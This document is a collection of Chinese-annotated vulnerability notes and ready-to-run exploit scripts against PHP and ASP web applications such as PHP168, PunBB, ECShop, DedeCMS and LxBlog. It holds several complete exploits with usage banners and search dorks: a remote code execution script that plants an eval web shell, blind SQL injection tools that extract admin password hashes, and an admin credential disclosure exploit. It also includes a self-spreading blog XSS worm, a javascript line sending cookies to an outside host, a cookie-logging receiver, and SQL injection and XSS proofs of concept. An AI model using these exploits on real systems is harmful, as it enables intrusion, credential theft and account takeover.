// cp.php

if (!$sax_uid || !$sax_pw || !$sax_logincount || !$sax_hash) {
// 只要这个条件不满足,就可以通过后台的权限验证了
    loginpage();
}
...
if ($sax_group == 1) {
// 如果要获得管理员权限,还必须保证$sax_group的值为1
...

// common.inc.php

list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
// authcode()就是简单的调用base64_decode
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
// 这些变量来自$_COOKIE,是可以控制的:)
// 不过后面的代码在一定条件下会通过extract($_EVO)来重新注册这些变量

$sax_uid = intval($sax_uid);
$sax_pw = sax_addslashes($sax_pw);
$sax_logincount = intval($sax_logincount);
$sax_group = 4;
// 默认的值为4,而我们需要的值是1
$_EVO = array();
// 这里是fix那个变量覆盖的漏洞:)

$seccode = $sessionexists = 0;
$userfields = 'u.userid AS sax_uid, u.username AS sax_user, u.password AS sax_pw, u.groupid AS sax_group, u.logincount AS sax_logincount, u.email as sax_email, u.url as sax_url, u.lastpost, u.lastip, u.lastvisit, u.lastactivity';
// 这里定义的字段包括sax_user、sax_pw、sax_group、sax_logincount,这些都是后台权限验证时要用到的
if ($sax_hash) {
    if ($sax_uid && $sax_pw) {
// 流程[1]
// 这里会查询sax_group,但如果我们想让查询出的值为1[也就是说查询出管理员的信息],就必须知道管理员的sax_hash、sax_pw、sax_logincount等多个值
        $query = $DB->query("SELECT s.hash, s.seccode, $userfields
            FROM {$db_prefix}users u
            LEFT JOIN {$db_prefix}sessions s ON (s.uid = u.userid)
            WHERE s.hash='$sax_hash' AND u.userid='$sax_uid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip'
            AND u.password='$sax_pw' AND u.logincount='$sax_logincount' AND s.auth_key='$sax_auth_key'");
    } else {
        $query = $DB->query("SELECT hash,uid as sessionuid,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip' LIMIT 1");
// 流程[2]
// 如果我们知道管理员的sax_hash和onlineip,就可以使下面的$_EVO['sessionuid']的值为管理员的id
    }
    if ($_EVO = $DB->fetch_array($query)){
        $sessionexists = 1;
        if($_EVO['sessionuid']) {
// 流程[3]
            $query = $DB->query("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='".intval($_EVO['sessionuid'])."'");
            $_EVO = array_merge($_EVO, $DB->fetch_array($query));
// 这里查询的数据会合并到$_EVO,而我们只要能控制$_EVO['sessionuid']的值为1[假设我们要查询的管理员id为1],就可以查询出正确的管理员信息,这样就可以保证sax_group的值为1了
            $sax_uid = $_EVO['userid'];
        }
    } else {
        if($_EVO = $DB->fetch_one_array("SELECT hash,groupid,seccode,lastactivity FROM {$db_prefix}sessions WHERE hash='$sax_hash' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'")) {
            dcookies();
            $sessionexists = 1;
        }
    }
}
......
@extract($_EVO);

// global.func.php

function updatesession() {
...
        replacesession(1);
...
}
...
function replacesession($insert = 0) {
...
$ips = explode('.', $onlineip);
...
        $DB->query("INSERT INTO {$db_prefix}sessions (hash, auth_key, ip1, ip2, ip3, ip4, uid, groupid, lastactivity, seccode, is_robot) VALUES ('$sax_hash', '$sax_auth_key', '$ips[0]', '$ips[1]', '$ips[2]', '$ips[3]', '$sax_uid', '$sax_group', '$timestamp', '$seccode', '".IS_ROBOT."')");
...

GET /cp.php  HTTP/1.1;
Host: 127.0.0.1
Connection: Close
Cookie: sax_auth=MQkJ;sax_hash=abcdef;

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';
/**
 * wolvez.php has this code:
 * <?eval($_POST[c])?>
 */
send($cmd);

if (!file_get_contents($url) && file_get_contents($shell) == 'puret_t')
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else 
    exit("Exploit Failed!\n");
    
function send($cmd)
{
    global $host, $path;
    
    $message = "POST ".$path."digg.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."login.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."search.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."sendpwd.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."showsp.php  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    
    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    
    return $resp;
}

?>

<?php
$sqlcontent = "<?PHP exit('Access Denied'); ?>".$p."\n";
file_put_contents($logfile, $sqlcontent);
?>

if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
    {
    ...
            'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \''.$_GET['secure_str'].'\''

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$pre = 'pun_';

$benchmark = 200000000;
$timeout = 10;

echo "Plz Waiting...\nPassword:\n";
/**
 * get pass
 */
$j = 1;
$pass = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //a-z letters

while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $pass .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255)
            exit("\nExploit Failed!\n");
    }
    $j ++;
}

echo "\nSalt:\n";
/**
 * get salt
 */
$j = 1;
$salt = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));

while (strlen($salt) < 12) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $salt .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255)
            exit("\nExploit Failed!\n");
    }
    $j ++;
}
        
exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");

function send()
{
    global $host, $path, $cmd;

    $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."  HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

<?
include_once("top.php");

      $newsid = intval($_GET['id']);
      
      $to_type = addslashes($_GET['type']);
      
      if ($to_type=='index')
      {
          $to_type_s =" and to_type=1";
      }
      
       if ($to_type=='webuser')
      {
          $to_type_s =" and to_type!=3";
      }
      
       if ($to_type=='webadver')
      {
          $to_type_s =" and to_type!=2";
      }
      
      $newssql = 'select * from zyads_news WHERE `id` =\'' . $newsid . '\' 

'.$to_type_s.'';
    
      $newsre=$db->query($newssql);
      $newsrow = $db->fetch_array($newsre);
      if (empty($newsrow)){

        zyads_message('zyads_news');
      }
?>

<?php
/*********************/
/*                   */
/*  Version : 5.1.0  */
/*  Author  : RM     */
/*  Comment : 071223 */
/*                   */
/*********************/

_obfuscate_JQYdYn1jfBI( );
define( "IN_ZYADS", TRUE );
$name = $_GET['name'];
$adid = $_GET['adid'];
$offsetwidth = $_GET['offsetwidth'];
$site = $_GET['site'];
$click_url = "http://www.erzhi.cn";
$count_url = "http://www.erzhi.cn";
if ( empty( $name ) || empty( $adid ) || empty( $site ) )
{
        exit( "广告出错" );
}
@require( "../user/c/".$name."/user_info.php" );
require( "../include/soft_class.php" );
require( "../include/settings.php" );
$code = new _obfuscate_Y2xpZW50( );
$getip = $code->_obfuscate_Z2V0aXA( );
$getbrowse = $code->_obfuscate_Z2V0YnJvd3Nl( );
$getos = $code->_obfuscate_Z2V0b3M( );
$maketime = time( ) + $setting['zyads_date'] * 3600;
$maketime = $maketime;
$strbas = $code->_obfuscate_cGFzc3BvcnRfZW5jcnlwdA( 

$getip."|".$maketime."|".$getbrowse."|".$getos, $setting['url_pwd'] );
$strbas = _obfuscate_IGI7aGd_LDRuMD0VZg( $strbas );
if ( $zyads_users['flag'] != 2 )
{
        echo "document.write('帐号被锁定');";
        exit( );
}
if ( _obfuscate_Cx96BhhwZxABPA8( "../cache/cpa/".$adid.".php" ) )
{
        require( "../cache/cpa/".$adid.".php" );
}
else
{
        exit( "文件丢失-".$adid.".php" );
}

<?php
//by q1ur3n
//team: http://www.wolvez.org
//exp : zyads.php?site=www.tx8688.com&id=and 1=2 union select 1,2,3,4,5,6%23
//敏感信息表信息：
/*
DROP TABLE IF EXISTS zyads_admin;
CREATE TABLE zyads_admin (
   id int(11) NOT NULL auto_increment,
   username varchar(20) NOT NULL,
   pwd varchar(50) NOT NULL,
   login_num int(11) NOT NULL,
   last_time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
   islock int(1) NOT NULL,
   ip varchar(20) NOT NULL,
   admin_flag varchar(200) NOT NULL,
   addtime datetime NOT NULL,
   PRIMARY KEY (id)
);

*/

$host = $_GET['site'];
$cmd='to_type_s='.urlencode(stripcslashes($_REQUEST["id"]));

$message = "GET /index/news.php?id=89  HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-

shockwave-flash, */*\r\n";
$message .= "Referer: http://www.baidu.com/\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Connection: Close\r\n";
$message .= "Cookie: ".$cmd."\r\n\r\n";
//echo $message;
       
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
fclose($fp);
       
?>

<?php

$message=$_GET['c'];
echo "<ul><li>".$message."</li>";
if(strpos($message, '[/c]') !== FALSE) {
    $message1 = preg_replace("/\[c](.+?)\[\/c\]/is", "\\1", $message);
}

echo "<li>".$message1."</li>";

if(strpos($message, '[/c]') !== FALSE) {
    $message2 = preg_replace("/\[c](.+?)\[\/c\]/ies", "parse_c('\\1')", $message);
}


echo "<li>".$message2."</li></ul>";

function parse_c($text) {
        return $text;
}

?>

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else 
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");
    
function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;
    
    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';
    
        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";
        
        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }
    
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    
    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    
    return $resp;
}

?>

<iframe style="display:none" src="http://www.blogbus.com/skin/?style=<SCRIPT%20src='http://www.delover.net/bus.js'></SCRIPT>"></iframe>

function createAjax() {
    var _xmlhttp;
    try {
        _xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e) {
        try {
            _xmlhttp=new XMLHttpRequest();
        }
        catch (e) {
            _xmlhttp=false;
        }
    }
    return _xmlhttp;
}

//javascript:alert(document.cookie)

function GetTag() {
    var xmlhttp=createAjax();
    if (xmlhttp) {
        xmlhttp.open('get','/user/?blogid=4884256&mm=Setting&n='+Math.random(),true);
        xmlhttp.onreadystatechange=function() {
            if (xmlhttp.readyState==4 && xmlhttp.status==200) {
                if (unescape(xmlhttp.responseText).indexOf("www.blogbus.com/skin")>=0 || unescape(xmlhttp.responseText).indexOf("img_regbtn.gif")>=0){
                    //传播过了
                }else{
                    AddNew();
                }
            }
        }
        xmlhttp.send(null);
    }
}

function AddNew() {
    var xmlhttp=createAjax();
    if (xmlhttp) {    

        var GuestInfo="BlogName=jackal&Description=jackal&AccessPwd=&Meta=%3Ciframe+style%3D%22display%3Anone%22+src%3D%22http%3A%2F%2Fwww.blogbus.com%2Fskin%2F%3Fstyle%3D%3CSCRIPT%2520src%3D%27http%3A%2F%2Fdelover.net%2Fbus.js%27%3E%3C%2FSCRIPT%3E%22%3E%3C%2Fiframe%3E&Submit=%E4%BF%9D%E5%AD%98%E8%AE%BE%E7%BD%AE";
        //debug
        //alert(GuestInfo);
        xmlhttp.open('post','/user/?mm=Setting&aa=Save&n='+Math.random(),true);
        xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
        xmlhttp.onreadystatechange=function() {
            if (xmlhttp.readyState==4 && xmlhttp.status==200) {
                //alert(unescape(xmlhttp.responseText));
            }
        }
        xmlhttp.send(GuestInfo);
    }
}

GetTag();

//检查和注册外部提交的变量
foreach($_REQUEST as $_k=>$_v)
{
    if( strlen($_k)>0 && eregi('^(_|cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )//程序员逻辑混乱了？
    {
        exit('Request var not allow!');
    }
}

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

//数据库配置文件
require_once(DEDEDATA.'/common.inc.php');

//系统配置参数
require_once(DEDEDATA."/config.cache.inc.php");

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数
if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}

$keyarr = array('name','type','tmp_name','size');

foreach($_FILES as $_key=>$_value)
{
    foreach($keyarr as $k)
    {
        if(!isset($_FILES[$_key][$k]))
        {
            exit('Request Error!');
        }
    }
    $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\","\\",$_FILES[$_key]['tmp_name']);
             //注意这个地方，通过common.inc.php的漏洞，我们是可以控制$_FILES[$_key]['tmp_name'] 的

//inc/mod_tag.php

------------------------
if (!defined('VALIDREQUEST')) die ('Access Denied.');

if (!$job) $job='default';
else $job=basename($job);
$itemid=safe_convert($itemid);

acceptrequest('tag,rewrite');
if ($tag!=='') $job='show';
$tag=($config['smarturl']==1 && $config['urlrewrite']==1 && $rewrite==1) ? tagurldecode($tag) : $tag;
//缺省情况$config['smarturl']==1 && $config['urlrewrite']==1 这个条件是不成立的，所以不会调用tagurldecode函数
//要管理员使用urlrewite功能才可以

if ($job=='default') {
..........
}

if ($job=='show') {
    acceptrequest('mode');
    if ($mode==1 || $mode==2) $mbcon['tag_list']=$mode-1;

    $m_b=new getblogs;
    if ($tag==='') catcherror($lnc[192]);
    
    //$tag 变量进入查询语句，但是需要一个单引号，我们恰好可以通过tagurldecode函数引入单引号
    $allentries=$blog->getgroupbyquery("SELECT * FROM `{$db_prefix}tags` WHERE `tagname`='{$tag}' LIMIT 0,1");
    if (!is_array($allentries[0]) || $allentries[0]['tagentry']=='<end>' || $allentries[0]['tagcounter']==0) {
----------------------------

function tagurlencode($str) {//编码函数
    $str=urlencode($str);
    $str=str_replace('-', '--', $str);
    $str=str_replace('%', '-', $str);
    return $str;
}
function tagurldecode($str) { //解码函数
    $str=str_replace('-', '%', $str);
    $str=str_replace('%%', '-', $str);
    $str=urldecode($str);
    return $str;
}

--------------------
poc:
index.php?act=tag&job=show&rewrite=1&tag=aaaa-27
---------------

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie 

<?php
ob_start(); 
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt

//发一条伪造的日志，这条日志里面也可以插入恶意代码
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";

fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");
fwrite($sock, $data);

$headers = "";
while ($str = trim(fgets($sock, 4096)))
     $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 4096);

fclose($sock);
//echo $body;

//跳转到一个正常的日志
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx"); 
ob_end_flush();

?>

    if (empty($_GET['type']))
    {
        ...
    }
    elseif ($_GET['type'] == 'collection')
    {
        ...
    }
    $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
    $res = $db->query($sql);

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works with register_globals = On
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path;

    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';

    $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...
$plugin_file = ROOT_PATH . '/includes/payment/' . $pay_code . '.php';
if (is_file($plugin_file))
{
    include_once($plugin_file);

=======================code==================================
/user/tag.php
<?php
!function_exists('usermsg') && exit('Forbidden');
!in_array($type,$item_type) && exit;
//$type、$item_type均没有初始化
require_once(R_P.'mod/charset_mod.php');
foreach ($_POST as $key => $value) {
    ${'utf8_'.$key} = $value;
    ${$key} = $db_charset != 'utf-8' ? convert_charset('utf-8',$db_charset,$value) : $value;
}

if ($job == 'add') {
    ……//省略部分代码
}elseif($job=="modify"){
    $tagnum="{$type}num"; 
    $touchtagdb=$db->get_one("SELECT k.tags,i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid=k.itemid WHERE k.itemid='$itemid'"); 
    //$type带入查询语句操作数据库
    $touchtagdb['uid']!=$admin_uid && exit;
……//省略部分代码
=======================code==================================

=======================code==================================
//user_index.php
<?php
……//省略部分代码
require_once(R_P.'user/global.php');
require_once(R_P.'user/top.php');

if (!$action) {
    ……//省略部分代码
} elseif ($action && file_exists(R_P."user/$action.php")) {
    $basename = "$user_file?action=$action";
    require_once(Pcv(R_P."user/$action.php"));
   //通过提交$action=tag即可以调用到存在漏洞的文件
}
……//省略部分代码
=======================code==================================

=======================code==================================
//user/global.php
<?
……//省略部分代码
if (!in_array($action,array('blogdata','comment','itemcp','post','userinfo'))) {
    //'blogdata','comment','itemcp','post','userinfo','global','top'
//我们提交的action=tag，不在上面这个数组里面，可以触发下面的代码成功绕过register_global的影响
    foreach ($_POST as $_key => $_value) {
        !ereg('^\_',$_key) && strlen(${$_key})<1 && ${$_key} = $_POST[$_key];
    }
    foreach ($_GET as $_key => $_value) {
        !ereg('^\_',$_key) && strlen(${$_key})<1 && ${$_key} = $_GET[$_key];
    }
}
……//省略部分代码
=======================code==================================

$touchtagdb=$db->get_one("SELECT k.tags,i.uid FROM pw_{$type} k LEFT JOIN pw_items i ON i.itemid=k.itemid WHERE k.itemid='$itemid'");

=======================poc==================================
//判断uid=1的用户的密码第一位的ASCII值是否大于0
http://blog.xxx.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid    =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
=======================poc==================================

=======================code==================================
function DB_ERROR($msg) {
        global $db_blogname,$REQUEST_URI;
        $sqlerror = mysql_error();
        $sqlerrno = mysql_errno();
        //ob_end_clean();
        echo"<html><head><title>$db_blogname</title><style type='text/css'>P,BODY{FONT-FAMILY:tahoma,arial,sans-serif;FONT-SIZE:11px;}A { TEXT-DECORATION: none;}a:hover{ text-decoration: underline;}TD { BORDER-RIGHT: 1px; BORDER-TOP: 0px; FONT-SIZE: 16pt; COLOR: #000000;}</style><body>\n\n";
        echo"<table style='TABLE-LAYOUT:fixed;WORD-WRAP: break-word'><tr><td>$msg";
        echo"<br><br><b>The URL Is</b>:<br>http://$_SERVER[HTTP_HOST]$REQUEST_URI";
        echo"<br><br><b>MySQL Server Error</b>:<br>$sqlerror  ( $sqlerrno )";
        echo"<br><br><b>You Can Get Help In</b>:<br><a target=_blank href=http://www.phpwind.net><b>http://www.phpwind.net</b></a>";
        echo"</td></tr></table>";
        exit;
    }
=======================code==================================

=======================poc==================================

http://www.lxblog.net/user_index.php?action=tag&job=modify&type=<script>alert(/xss/)</script>&item_type[]=<script>alert(/xss/)</script>

=======================poc==================================

    szAgent = Request.ServerVariables("HTTP_USER_AGENT")
    aTmpInfo = Split(szAgent, " (", -1, 1)
    aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1)

    szBrowser = aAgentInfo(1)
    if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then
        szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1)
    else
        szOS = aAgentInfo(2)
    end if
    szClientIP = Request.ServerVariables("REMOTE_ADDR")

    szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now &"')"
    con.Execute szSQL

POST /webmedia/oemui/user/guest.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, 
Referer: [url]http://you.are.fucked.cn/webmedia/oemui/user/guest.asp[/url]
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: you.are.fucked.cn
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;


memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E

<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>

http://www.xxxx.com/inc/realplay.php?link=<script>alert('xss')</script>

Sub checkPower
    dim loginValidate,rsObj : loginValidate = "maxcms2.0"
    err.clear
    on error resume next
    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
    loginValidate = md5(getAgent&getIp&rsObj(0))
    if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    checkManagerLevel  rsObj(1)
